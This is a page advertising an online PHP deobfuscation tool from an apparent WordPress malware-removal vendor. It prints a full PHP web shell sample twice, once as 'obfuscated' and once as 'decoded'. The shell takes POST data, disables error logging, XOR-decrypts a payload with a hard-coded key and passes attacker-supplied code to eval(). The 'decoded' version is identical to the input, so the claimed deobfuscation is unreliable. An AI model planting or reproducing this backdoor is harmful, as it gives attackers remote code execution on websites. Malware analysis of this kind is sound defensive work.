Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3"; $GLOBALS["baa15"] = "chr"; $GLOBALS["hefaea"] = "ord"; $GLOBALS["b43ce01"] = "strlen"; $GLOBALS["o2dac69"] = "ini_set"; $GLOBALS["n800cc9"] = "json_d...



Obfuscated php code

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";
$GLOBALS["ca7db"] = $_POST;
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$k6de1cb3 = NULL;
$v24368366 = NULL;
$GLOBALS["cc688"] = "5p1n-th3-51lly-5tr1ng5";
global $cc688;
function ae858b($k6de1cb3, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($k6de1cb3, $rbf8cd4)
{
    global $cc688;
    return ae858b(ae858b($k6de1cb3, $cc688), $rbf8cd4);
}
if (!$k6de1cb3) {
    foreach ($GLOBALS["ca7db"] as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}
$k6de1cb3 = @$GLOBALS[$GLOBALS['d318a0a98'][72] . $GLOBALS['d318a0a98'][56] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][0]]($GLOBALS[$GLOBALS['d318a0a98'][20] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][0] . $GLOBALS['d318a0a98'][68] . $GLOBALS['d318a0a98'][56]]($GLOBALS[$GLOBALS['d318a0a98'][14] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16] . $GLOBALS['d318a0a98'][43] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][52] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16]]($k6de1cb3), $v24368366), true);
if (isset($k6de1cb3[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) && $cc688 == $k6de1cb3[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) {
    if ($k6de1cb3[$GLOBALS['d318a0a98'][62]] == $GLOBALS['d318a0a98'][90]) {
        eval($k6de1cb3[$GLOBALS['d318a0a98'][93]]);
    }
    exit;
}

Decoded(de-Obfuscated) php code

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";
$GLOBALS["ca7db"] = $_POST;
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$k6de1cb3 = NULL;
$v24368366 = NULL;
$GLOBALS["cc688"] = "5p1n-th3-51lly-5tr1ng5";
global $cc688;
function ae858b($k6de1cb3, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($k6de1cb3, $rbf8cd4)
{
    global $cc688;
    return ae858b(ae858b($k6de1cb3, $cc688), $rbf8cd4);
}
if (!$k6de1cb3) {
    foreach ($GLOBALS["ca7db"] as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}
$k6de1cb3 = @$GLOBALS[$GLOBALS['d318a0a98'][72] . $GLOBALS['d318a0a98'][56] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][0]]($GLOBALS[$GLOBALS['d318a0a98'][20] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][0] . $GLOBALS['d318a0a98'][68] . $GLOBALS['d318a0a98'][56]]($GLOBALS[$GLOBALS['d318a0a98'][14] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16] . $GLOBALS['d318a0a98'][43] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][52] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16]]($k6de1cb3), $v24368366), true);
if (isset($k6de1cb3[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) && $cc688 == $k6de1cb3[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) {
    if ($k6de1cb3[$GLOBALS['d318a0a98'][62]] == $GLOBALS['d318a0a98'][90]) {
        eval($k6de1cb3[$GLOBALS['d318a0a98'][93]]);
    }
    exit;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.